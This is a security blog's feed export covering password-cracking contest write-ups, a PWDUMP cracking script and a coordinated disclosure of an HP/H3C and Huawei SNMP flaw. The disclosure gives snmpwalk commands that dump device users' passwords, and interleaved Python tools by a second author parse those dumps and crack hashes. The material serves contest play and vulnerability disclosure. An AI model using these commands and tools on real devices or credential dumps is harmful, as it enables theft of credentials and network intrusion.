tag:blogger.com,1999:blog-286873712024-02-19T17:30:29.458-08:00Superimposing Nothing NowhereThe internet is littered with wastes of space. This one is no different except that it is my waste of space.Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.comBlogger48125tag:blogger.com,1999:blog-28687371.post-23086255887636618132013-08-11T16:18:00.000-07:002013-08-11T16:18:27.202-07:00Crack Me If You Can 2013 - Street Challenge 3<div dir="ltr" style="text-align: left;" trbidi="on">
Crack Me If You Can Street Challenge #3 was a fairly straightforward "extract hashes and start cracking" problem. The hashes were salted SHA-1 stored inside a Berkeley DB file. You could certainly have spent time getting db_dump to work, but it's faster to just run strings over the file and pull out the hash and salt fields. One thing to settle before you burn GPU time is whether the salt is hashed before or after the password, since sha1($s.$p) and sha1($p.$s) are different formats to a cracker.<br />
<div>
<br /></div>
<script src="https://gist.github.com/grutz/6207325.js"></script>
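As an added example (my code, not the gist above, which is the author's), here is the strings-and-filter step in Python plus the salt-ordering check: scrape printable runs out of a binary blob the way strings(1) does, keep the runs that look like user:sha1hex:salt records, and try a small wordlist in both sha1(salt+pass) and sha1(pass+salt) order so the first crack tells you which john format to use. The record layout, the salt alphabet and the blob are all assumptions: the post does not describe the Berkeley DB contents, and the blob below is constructed, not the challenge file. The dynamic_24/dynamic_25 numbering is what I recall from jumbo's subformat list; confirm it with john --list=subformats before a bulk run.

```python
"""Scrape salted SHA-1 records out of a binary file, strings(1)-style,
and work out the salt ordering before handing them to john.

Assumed record layout (not from the post): user:<40 hex sha1>:<ascii salt>
"""
import hashlib
import re

# Salt alphabet and length are assumptions; widen them to match what strings shows you.
RECORD_RE = re.compile(r"^([^:\s]+):([0-9a-fA-F]{40}):([A-Za-z0-9./]{1,16})$")


def strings(blob: bytes, min_len: int = 4) -> list:
    """Return printable-ASCII runs of at least min_len bytes, like `strings -n 4`."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(blob)]


def extract_records(blob: bytes) -> list:
    """Keep only the runs that look like user:hash:salt records."""
    out = []
    for run in strings(blob):
        m = RECORD_RE.match(run)
        if m:
            out.append((m.group(1), m.group(2).lower(), m.group(3)))
    return out


def salted_sha1(password: str, salt: str, salt_first: bool) -> str:
    """sha1(salt + pass) when salt_first, else sha1(pass + salt)."""
    pw, s = password.encode(), salt.encode()
    return hashlib.sha1(s + pw if salt_first else pw + s).hexdigest()


def crack(records: list, wordlist: list) -> dict:
    """Try each word in both orderings. The first hit fixes the ordering for the
    whole set; after that you stop guessing and use the matching john format."""
    cracked = {}
    for user, digest, salt in records:
        for word in wordlist:
            for order in ("salt_first", "pass_first"):
                if salted_sha1(word, salt, order == "salt_first") == digest:
                    cracked[user] = (word, order)
                    break
            if user in cracked:
                break
    return cracked


def to_john(records: list, order: str) -> list:
    """Emit john jumbo 'dynamic' lines. Assumed mapping (check `john --list=subformats`):
    dynamic_25 = sha1($s.$p), dynamic_24 = sha1($p.$s)."""
    fmt = "dynamic_25" if order == "salt_first" else "dynamic_24"
    return [f"{user}:${fmt}${digest}${salt}" for user, digest, salt in records]


def _record(user: str, password: str, salt: str) -> bytes:
    return f"{user}:{salted_sha1(password, salt, True)}:{salt}".encode()


# Constructed stand-in for the challenge's Berkeley DB file: a few records
# between binary page headers. Not the real file.
SAMPLE_BLOB = (
    b"\x00\x00\x00\x00\x62\x31\x05\x00"
    + _record("alice", "letmein", "x9Lq2pRz") + b"\x00\x00\x08\x00"
    + _record("bob", "sunshine", "Q7hT4vBn") + b"\xff\xfe\x00"
    + _record("carol", "iloveyou", "mN3kP8sd") + b"\x00" * 16
)
WORDLIST = ["123456", "password", "iloveyou", "letmein", "sunshine"]  # stand-in for rockyou.txt

if __name__ == "__main__":
    recs = extract_records(SAMPLE_BLOB)
    hits = crack(recs, WORDLIST)
    order = next(iter(hits.values()))[1] if hits else "salt_first"
    for line in to_john(recs, order):
        print(line)
    print(hits)
```

On a real file you would replace SAMPLE_BLOB with open(path, "rb").read(), eyeball the strings() output to fix RECORD_RE, and only use crack() long enough to learn the ordering; the heavy lifting belongs to john with the to_john() lines.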
<br />
<div>
<br />
<div>
<br /></div>
<div>
<br /></div>
</div>
</div>
<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-34973976169175372912013-08-11T14:09:00.001-07:002013-08-11T18:08:33.740-07:00Crack Me If You Can 2013 - Challenge 9: Part 1<div dir="ltr" style="text-align: left;" trbidi="on">
I again had some fun this year playing <a href="https://twitter.com/CrackMeIfYouCan" target="_blank">KoreLogic's</a> <a href="http://contest-2013.korelogic.com/" target="_blank">Crack Me If You Can</a> password cracking contest at DEFCON 21. This year they separated teams into "Pros" and "Street" to make things a little fairer for individuals versus large groups. If you have any interest in password cracking you can still download all four years of past contest data and crack away! Huge thanks to the KoreLogic guys for putting on an excellent contest!<br />
<br />New to the contest this year, password hash files were grouped into companies, each with its own password policy. Descriptions of the policies were given as hints within the Challenge files, which could have their own complex password requirements. It was truly inventive and gave the contest a real-world feel.<br />
<br />
Of course my biggest problem is that by playing the game you don't get to really attend DEFCON so I didn't spend a lot of time cracking. You can tell my submissions were pretty much few and far between when I was back in my hotel room:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://contest-2013.korelogic.com/pix/graphs/Team-Crakka_Lakka_Ding_Dongs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://contest-2013.korelogic.com/pix/graphs/Team-Crakka_Lakka_Ding_Dongs.png" width="320" /></a></div>
Even so I came in third place mostly because I spent a little extra time on Challenge 9 because of the point value - 250,000 points!<br />
<br />
<a href="http://contest-2013.korelogic.com/stats_types.html">http://contest-2013.korelogic.com/stats_types.html</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUOnN7SlXn9mwTzOybhfDS2w5amrbpljBlDXeTPkTNbboF8H0YxESAF6tj9swyV1sMTPqCVjeXx0u09Q7SBgyTO-E5-SfaiwP6f4-1SkfV6s3qLQWsmORf33rpBsh9tTR7uIs/s1600/cmiyc-chall9-points.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="18" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUOnN7SlXn9mwTzOybhfDS2w5amrbpljBlDXeTPkTNbboF8H0YxESAF6tj9swyV1sMTPqCVjeXx0u09Q7SBgyTO-E5-SfaiwP6f4-1SkfV6s3qLQWsmORf33rpBsh9tTR7uIs/s400/cmiyc-chall9-points.png" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://contest-2013.korelogic.com/pix/graphs/figureStreet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://contest-2013.korelogic.com/pix/graphs/figureStreet.png" width="400" /></a></div>
As you can tell from the graph the scores for three of us (brad, I Cant Believe Its Not Butter, and me) jumped near the final few hours of the contest because of Challenge 9. Here's how I did it...<br />
<br />
<h2 style="text-align: left;">
Cracking Street Challenge 9</h2>
<div>
Challenge 9 was delivered as a compressed tar file. After opening it up you're given a README and a dd-created disk image:</div>
<div>
<br /></div>
<div>
<div>
<script src="https://gist.github.com/grutz/6206702.js"></script></div>
</div>
<div>
<br /></div>
<div>
To mount the image you need to skip the first 65536 bytes (1 cylinder) to get to the partition data. That offset is the partition's start sector times the sector size, which fdisk -l or parted will report for the image, and mount -o ro,loop,offset=65536 does the skipping (read-only, so you don't alter the evidence). With the filesystem mounted, let's check out what's in there!</div>
<div>
<br /></div>
<div>
<script src="https://gist.github.com/grutz/6206714.js"></script></div>
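Rather than trusting a number from memory, you can read the offset straight out of the image's MBR. The following is an added example (mine, not from the post) that parses the four partition-table slots, turns the start LBA into the byte offset mount wants, and prints the mount command. The 512-byte MBR it runs on is constructed to match the post's case (first partition at LBA 128, i.e. byte 65536); it is not the challenge image, and chal9.dd and /mnt/chal9 are made-up names.

```python
"""Find the mount offset for a raw dd image by reading its MBR partition table."""
import struct

SECTOR = 512
BOOT_SIG = b"\x55\xaa"


def parse_mbr(sector0: bytes) -> list:
    """Return the non-empty entries of the classic 4-slot MBR partition table.
    Each entry is 16 bytes starting at offset 446: status, CHS start, type,
    CHS end, LBA start (uint32 LE), sector count (uint32 LE)."""
    if len(sector0) < 512 or sector0[510:512] != BOOT_SIG:
        raise ValueError("no 0x55AA boot signature: not an MBR image (GPT-only or bare filesystem?)")
    parts = []
    for slot in range(4):
        entry = sector0[446 + 16 * slot: 446 + 16 * (slot + 1)]
        status, ptype = entry[0], entry[4]
        lba_start, num_sectors = struct.unpack("<II", entry[8:16])
        if ptype == 0 or num_sectors == 0:
            continue  # unused slot
        parts.append({
            "slot": slot + 1,
            "bootable": status == 0x80,
            "type": ptype,                  # 0x83 Linux, 0x07 NTFS/exFAT, 0xEE = protective MBR, look for GPT
            "offset": lba_start * SECTOR,   # the value mount -o offset= needs
            "size": num_sectors * SECTOR,
        })
    return parts


def mount_command(image: str, part: dict, mountpoint: str = "/mnt/chal9") -> str:
    """Read-only loop mount at the partition's byte offset (standard mount(8) options)."""
    return f"mount -o ro,loop,offset={part['offset']} {image} {mountpoint}"


def partitions_of(image_path: str) -> list:
    """Convenience wrapper for a real image on disk."""
    with open(image_path, "rb") as fh:
        return parse_mbr(fh.read(SECTOR))


def constructed_mbr() -> bytes:
    """A 512-byte MBR built here for the example: one bootable Linux partition
    starting at LBA 128, i.e. byte 65536, matching the offset the post used."""
    mbr = bytearray(512)
    mbr[446:462] = bytes([0x80, 0, 0, 0, 0x83, 0, 0, 0]) + struct.pack("<II", 128, 2048)
    mbr[510:512] = BOOT_SIG
    return bytes(mbr)


if __name__ == "__main__":
    for part in parse_mbr(constructed_mbr()):
        print(part)
        print(mount_command("chal9.dd", part))
```

If the only entry has type 0xEE the image is GPT-partitioned and you need to read the GPT header at LBA 1 instead; if there is no 0x55AA signature at all, the image is probably a bare filesystem and mounts with no offset.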
<div>
<br /></div>
<div>
Hmm, mabel.pfx looks interesting, and the secret documents are certainly something we want to read: they should tell us about Company3's password policy. But they're encrypted. Let's break the PFX open with John the Ripper jumbo from <a href="https://github.com/magnumripper/JohnTheRipper">https://github.com/magnumripper/JohnTheRipper</a>. Its pfx2john tool extracts the PKCS#12 integrity MAC into a john-loadable hash, so john is checking candidate passwords against that MAC rather than trying to decrypt the key bag. Run it through the RockYou wordlist:</div>
<div>
<br /></div>
<div>
<script src="https://gist.github.com/grutz/6206734.js"></script></div>
<div>
<br /></div>
<div>
Success! Only took about 4 hours thanks to a weak password! Now we just have to figure out how to pull the files off, import the PFX into Windows... etc. etc.. Windows.. pffft.</div>
</div>
Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-19328393793394305682012-11-14T09:46:00.000-08:002012-11-14T09:46:54.883-08:00Huawei Security Advisory released for SNMP<div dir="ltr" style="text-align: left;" trbidi="on">
For those keeping track, Huawei has released their advisory and work-around for affected devices.<br />
<br />
<a href="http://support.huawei.com/support/pages/news/NewsInfoAction.do?actionFlag=view&doc_id=IN0000054930&colID=ROOTENWEB%7CCO0000000170">http://support.huawei.com/support/pages/news/NewsInfoAction.do?actionFlag=view&doc_id=IN0000054930&colID=ROOTENWEB%7CCO0000000170</a><br />
<br />
<br /></div>
Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-47200282999012956352012-10-24T08:35:00.000-07:002012-10-24T08:41:22.505-07:00Crack All The Hashes!<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
Crack All The Hashes!</h2>
<div>
A few months back I was having a discussion with a co-worker about how to effectively crack a large PWDUMP file (thousands and thousands of users and hashes). I have a bunch of manual steps I use to churn through John the Ripper, oclHashcat and Rainbowcrack that I shared. Then I asked myself, "wtf, why not make a shell script instead?"</div>
<div>
<br /></div>
<div>
When mubix mentioned <a href="http://www.room362.com/blog/2012/10/24/lm2ntlm-with-john-the-ripper.html" target="_blank">lm2ntlm</a> patches to JtR for helping to crack from LANMAN to NTLM I remembered that I never fully wrote up anything here about the script. Soo... here's the script!<br />
<br />
Fork it, fix it, do whatever you want with it from <a href="https://gist.github.com/3416932">https://gist.github.com/3416932</a><br />
<br />
Execution is fairly straightforward. Hopefully I didn't make any glaring security holes when processing PWDUMP files. Use all your favorite precautions before or while running this.</div>
<div>
<br />
<script src="https://gist.github.com/3416932.js?file=crack-all-lm.sh"></script>
</div>
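As an added example (mine, not the author's crack-all-lm.sh above), here is the LM-to-NTLM step that the lm2ntlm patches automate, in Python: parse PWDUMP lines, set aside accounts whose LM field is the empty-password constant (nothing to bootstrap from), and for each account john cracked in LM mode, toggle the case of every letter of the uppercase LM crack until the NT hash matches. MD4 is implemented inline because hashlib's md4 is disabled in many OpenSSL 3 builds. The PWDUMP lines are constructed: the LM/NT pair for jsmith is the well-known hash pair for the word "password", svc_backup's NT hash is a placeholder, and LM_CRACKS stands in for what john's LM mode would hand back.

```python
"""LM -> NTLM case recovery over a PWDUMP file (user:rid:lmhash:nthash:::)."""
import itertools
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM of the empty password, or LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4("") = NT hash of the empty password


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is often unavailable on OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + f(b, c, d) + X[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next op updates the old d, etc.
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def ntlm(password: str) -> str:
    """NT hash = MD4 of the UTF-16LE password, as hex."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(text: str) -> list:
    """Return (user, rid, lm, nt) tuples from PWDUMP lines, skipping junk."""
    rows = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) >= 4 and not line.startswith("#"):
            rows.append((fields[0], fields[1], fields[2].lower(), fields[3].lower()))
    return rows


def lm2ntlm(lm_plain: str, nt_hash: str):
    """LM uppercases the password, so toggle the case of each letter in the LM
    crack until the NT hash matches. Only works for passwords of 14 chars or
    fewer (LM's limit) and when both 7-char halves were cracked."""
    letters = [i for i, ch in enumerate(lm_plain) if ch.isalpha()]
    for mask in itertools.product((False, True), repeat=len(letters)):
        chars = list(lm_plain.upper())
        for flip, i in zip(mask, letters):
            if flip:
                chars[i] = chars[i].lower()
        cand = "".join(chars)
        if ntlm(cand) == nt_hash.lower():
            return cand
    return None


# Constructed PWDUMP lines (not a real dump). jsmith's LM/NT pair is the
# well-known pair for "password"; svc_backup's NT hash is a placeholder.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jsmith:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""
LM_CRACKS = {"jsmith": "PASSWORD"}  # constructed: what john's LM mode would report


def triage(pwdump_text: str, lm_cracks: dict) -> dict:
    """Sort accounts into empty-password, NT-only (no LM to bootstrap from),
    recovered via lm2ntlm, and LM-only cracks still needing NT work."""
    out = {"empty": [], "nt_only": [], "recovered": {}, "still_lm_only": []}
    for user, _rid, lm, nt in parse_pwdump(pwdump_text):
        if nt == EMPTY_NT:
            out["empty"].append(user)
        elif lm == EMPTY_LM:
            out["nt_only"].append(user)
        elif user in lm_cracks and (pw := lm2ntlm(lm_cracks[user], nt)) is not None:
            out["recovered"][user] = pw
        else:
            out["still_lm_only"].append(user)
    return out


if __name__ == "__main__":
    print(triage(SAMPLE_PWDUMP, LM_CRACKS))
```

The nt_only bucket is the one that still needs a real NTLM attack; everything in recovered is done, and still_lm_only usually means john only got one 7-character half back.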
</div>
Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-42679165209616218882012-10-23T10:19:00.001-07:002012-10-26T07:38:00.581-07:00HP/H3C and Huawei SNMP Weak Access to Critical Data <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
</div>
<h2 style="text-align: left;">
HP/H3C and Huawei SNMP Weak Access to Critical Data</h2>
<h3 style="text-align: left;">
Overview</h3>
<div style="text-align: left;">
HP/H3C and Huawei networking equipment suffers from a serious weakness in how it handles Simple Network Management Protocol (SNMP) requests for objects in h3c-user.mib and hh3c-user.mib that are supposed to be protected.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Identifiers</h3>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> US-CERT <a href="http://www.kb.cert.org/vuls/id/225404" target="_blank">VU#225404</a></li>
<li> <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3268" target="_blank">CVE-2012-3268</a></li>
</ul>
<br />
<div style="text-align: left;">
</div>
<h3 style="text-align: left;">
Vendor releases</h3>
<div style="text-align: left;">
<h4 style="text-align: left;">
HP/H3C:</h4>
<h4 style="text-align: left;">
<ul style="text-align: left;">
<li><a href="https://h20565.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685&ac.admitted=1350939600802.876444892.492883150">https://h20565.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685&ac.admitted=1350939600802.876444892.492883150</a></li>
</ul>
</h4>
</div>
<div style="text-align: left;">
<h4 style="text-align: left;">
Huawei EBG:</h4>
<ul style="text-align: left;">
<li>SN: <a href="http://support.huawei.com/enterprise/NewsReadAction.action?newType=0301&contentId=NEWS1000001069&idAbsPath=0301_10001&nameAbsPath=Services%2520News">http://support.huawei.com/enterprise/NewsReadAction.action?newType=0301&contentId=NEWS1000001069&idAbsPath=0301_10001&nameAbsPath=Services%2520News</a></li>
</ul>
<h4 style="text-align: left;">
Huawei CBG:</h4>
<ul style="text-align: left;">
<li>SN: <a href="http://support.huawei.com/support/pages/news/NewsInfoAction.do?doc_id=IN0000054625&colID=ROOTENWEB|CO0000000170&actionFlag=view">http://support.huawei.com/support/pages/news/NewsInfoAction.do?doc_id=IN0000054625&colID=ROOTENWEB|CO0000000170&actionFlag=view</a></li>
</ul>
</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Researcher</h3>
<div style="text-align: left;">
Kurt Grutzmacher</div>
<div style="text-align: left;">
grutz <at> jingojango dot net</div>
<div style="text-align: left;">
<a href="http://grutztopia.jingojango.net/">http://grutztopia.jingojango.net/</a></div>
<div style="text-align: left;">
twitter: <a href="https://twitter.com/grutz" target="_blank">@grutz</a></div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Details</h3>
<div style="text-align: left;">
Huawei/H3C have two enterprise OID trees, 'old' and 'new':</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> old: 1.3.6.1.4.1.2011.10</li>
<li> new: 1.3.6.1.4.1.25506</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Most devices answer under both trees.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The MIBs h3c-user.mib and hh3c-user.mib, for the purpose of this document, will be referred to as (h)h3c-user.mib. This MIB defines the internal table and objects to "Manage configuration and Monitor running state for userlog feature."</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
That makes it a MIB with objects that penetration testers and attackers alike want to get their hands on. Most of its objects are meant to be accessible only with the read/write community string.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In the revision history of (h)h3c-user.mib, version 2.0 changed the MAX-ACCESS of the following objects in the (h)h3cUserInfoEntry sequence from read-only to read-create:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> (h)h3cUserName</li>
<li> (h)h3cUserPassword</li>
<li> (h)h3cAuthMode</li>
<li> (h)h3cUserLevel</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
These objects exist to expose the locally configured users to anyone holding a valid SNMP community. After the change, only holders of the read-write community string should have been able to read them, but that is not what shipped: the code kept the earlier read-only access.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
So if you have the SNMP public (read-only) community string, you can read every local user's name, password, auth mode and privilege level.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Why this is impactful</h3>
<div style="text-align: left;">
The (h)h3cUserPassword is presented in one of three formats as defined in the (h)h3cAuthMode object and mirrors how passwords are stored in the device configuration:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> 0 -- password simple, meaning cleartext</li>
<li> 7 -- password cipher, meaning ciphertext</li>
<li> 9 -- password sha-256, meaning one-way sha-256 hash</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
SHA-256 is a recent addition and is not supported on all devices yet.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
On top of this, (h)h3cUserLevel ranges from 0 to 3, where 0 is the most limited access and 3 is full access, so the output also tells you which credentials are worth trying first.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Globbing some users</h3>
<div style="text-align: left;">
You must have an SNMP read-only or read-write community string and access to the SNMP port (udp/161) for this to work:</div>
<blockquote class="tr_bq" style="text-align: left;">
$ snmpwalk -c public -v 1 $IP 1.3.6.1.4.1.2011.10.2.12.1.1.1</blockquote>
<div style="text-align: left;">
or</div>
<blockquote class="tr_bq" style="text-align: left;">
$ snmpwalk -c public -v 1 $IP 1.3.6.1.4.1.25506.2.12.1.1.1</blockquote>
<div style="text-align: left;">
<br /></div>
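The walk comes back as one varbind per column per user, which is tedious to read by eye on a device with many accounts. As an added example (mine, not one of the advisory's tools), the script below takes snmpwalk -On output for either OID tree, regroups it by row index into one record per user, decodes (h)h3cAuthMode, and ranks the rows: cleartext first, then level-3 accounts. Two assumptions not stated in the advisory: the column numbers (.1 name, .2 password, .3 authmode, .4 level) follow the order the MIB lists the objects, and the row index is the trailing sub-identifier. The sample lines are constructed, not captured from a device, and the cipher and SHA-256 values in them are placeholders.

```python
"""Regroup `snmpwalk -On` output of the (h)h3cUserInfoTable into a per-user report."""
import re

OLD_TABLE = "1.3.6.1.4.1.2011.10.2.12.1.1.1"   # h3c-user.mib under the old enterprise OID
NEW_TABLE = "1.3.6.1.4.1.25506.2.12.1.1.1"     # hh3c-user.mib under the new enterprise OID
# Column numbers are assumed to follow the order the MIB lists the objects.
COLUMNS = {1: "name", 2: "password", 3: "authmode", 4: "level"}
AUTHMODE = {0: "simple (cleartext)", 7: "cipher", 9: "sha-256 (one-way)"}

# .<oid> = <TYPE>: <value>   (numeric OIDs, as printed with -On)
LINE_RE = re.compile(r"^\.?(?P<oid>[\d.]+)\s*=\s*(?P<type>[A-Za-z-]+):\s*(?P<val>.*)$")


def parse_walk(text: str) -> dict:
    """Group varbinds by row index: {index: {name, password, authmode, level}}."""
    users = {}
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        oid, vtype, val = m.group("oid"), m.group("type"), m.group("val").strip()
        for table in (OLD_TABLE, NEW_TABLE):
            if not oid.startswith(table + "."):
                continue
            col, _, index = oid[len(table) + 1:].partition(".")
            if not col.isdigit() or not index:
                break
            if vtype == "STRING":
                val = val.strip('"')
            elif vtype == "INTEGER":
                val = int(val)
            users.setdefault(index, {})[COLUMNS.get(int(col), f"col{col}")] = val
            break
    return users


def findings(users: dict) -> list:
    """One (severity, name, auth mode, level, password) tuple per local user.
    Cleartext is the worst case; a level-3 account with a cipher or hash still
    hands an attacker a privileged username to go after."""
    rows = []
    for index in sorted(users, key=lambda i: [int(x) for x in i.split(".") if x.isdigit()]):
        u = users[index]
        mode, level = u.get("authmode"), u.get("level")
        if mode == 0:
            sev = "CRITICAL"
        elif level == 3:
            sev = "HIGH"
        else:
            sev = "MEDIUM"
        rows.append((sev, u.get("name"), AUTHMODE.get(mode, f"unknown({mode})"), level, u.get("password")))
    return rows


# Constructed sample (not captured from a device): three local users, old OID tree.
SAMPLE_WALK = """\
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.1 = STRING: "admin"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.2 = STRING: "netops"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.1.3 = STRING: "monitor"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.2.1 = STRING: "Sup3rS3cret!"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.2.2 = STRING: "RXMQRJBWPWJXLWNWTSRPBHQ"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.2.3 = STRING: "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
.1.3.6.1.4.1.2011.10.2.12.1.1.1.3.1 = INTEGER: 0
.1.3.6.1.4.1.2011.10.2.12.1.1.1.3.2 = INTEGER: 7
.1.3.6.1.4.1.2011.10.2.12.1.1.1.3.3 = INTEGER: 9
.1.3.6.1.4.1.2011.10.2.12.1.1.1.4.1 = INTEGER: 3
.1.3.6.1.4.1.2011.10.2.12.1.1.1.4.2 = INTEGER: 3
.1.3.6.1.4.1.2011.10.2.12.1.1.1.4.3 = INTEGER: 0
"""

if __name__ == "__main__":
    for row in findings(parse_walk(SAMPLE_WALK)):
        print(*row, sep="\t")
```

Feed it the real thing with snmpwalk -On -c public -v 1 $IP 1.3.6.1.4.1.2011.10.2.12.1.1.1 > walk.txt and parse_walk(open("walk.txt").read()); the -On flag matters because the default symbolic output would not match LINE_RE.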
<h3 style="text-align: left;">
Weaponizing</h3>
<div style="text-align: left;">
Files relevant to this disclosure:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li> hh3c-localuser-enum.rb - Metasploit auxiliary scanner module</li>
<li> snmp-h3c-login.nse - Nmap Scripting Engine module</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
These will soon be posted to <a href="https://github.com/grutz/h3c-pt-tools">https://github.com/grutz/h3c-pt-tools</a> and submitted for inclusion in each tool.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Mitigation</h3>
<div style="text-align: left;">
By itself this is already bad, but if you do any of the following you may already be protected:</div>
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li>Use complex SNMP community strings, or disable SNMPv1/v2c in favour of SNMPv3 with authentication</li>
<li>Have disabled the mib entries for (h)h3c-user</li>
<li>Block SNMP using access controls or firewalls</li>
<li>Do not define local users, use RADIUS or TACACS+</li>
</ul>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
More specific routines can be found in the vendor's release.</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Why this is a bigger problem</h3>
<div style="text-align: left;">
People make poor choices. They like to think their equipment won't rat them out so they use cleartext passwords on networking equipment.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The cipher is an interesting one because it's basically an unknown... What, you think the only thing I had to share at Toorcon was SNMP and some cleartext credentials?</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Timeline</h3>
<div style="text-align: left;">
<i>June-ish 2012</i>: Research begins after seeing something cool on a penetration test</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>August 6, 2012</i>: Contacted US-CERT to coordinate vendor disclosure, VU#225404</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>September 5, 2012</i>: No response from H3C, contacted US-CERT again</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>September 6, 2012</i>: H3C (through US-CERT) requests more time, I state intention to present findings at Toorcon (Oct 19/20, 2012) or disclose if talk not accepted.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>September 18, 2012</i>: Approved for Toorcon! Information goes up not long after on Toorcon website.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>September 18-October 16, 2012</i>: Build slides, work on tools, no contact with US-CERT or vendors.</div>
<div style="text-align: left;">
